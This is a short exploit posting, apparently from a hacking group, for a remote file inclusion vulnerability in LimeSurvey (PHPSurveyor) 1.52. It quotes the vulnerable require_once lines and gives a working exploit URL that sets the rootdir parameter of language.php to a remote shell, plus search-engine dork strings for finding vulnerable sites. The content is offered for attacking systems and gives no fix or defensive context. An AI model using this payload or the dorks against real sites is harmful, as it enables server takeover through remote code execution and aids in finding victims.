limesurvey152-rfi.txt
Posted on 19 October 2007
\|/// \ - - // Xmors Underground Group ( @ @ ) ----oOOo--(_)-oOOo-------------------------------------------------- Portal : LimeSurvey (PHPSurveyor) 1.52 plus_build 2007.10.16 Download : http://garr.dl.sourceforge.net/sourceforge/limesurvey/limesurvey152plus_build3386_20071016.zip Author : S.W.A.T. HomePage : wWw.XmorS.CoM Type : Remote File Inclusion Y! ID : Svvateam E-Mail : Svvateam@yahoo.com / S.W.4.T@hackermail.com Dork : "You have not provided a survey identification number" Dork2 : "LimeSurvey" ----ooooO-----Ooooo-------------------------------------------------- ( ) ( ) ( ) / \_) (_/ +---------------------------------------------------------------------------------------------+ Vuln Code : require_once($rootdir.'/classes/php-gettext/gettext.php'); require_once($rootdir.'/classes/php-gettext/streams.php'); +---------------------------------------------------------------------------------------------+ +---------------------------------------------------------------------------------------------+ Exploit : http://[TARGET]/[PATH]/classes/core/language.php?rootdir=[-Sh3ll-] +---------------------------------------------------------------------------------------------+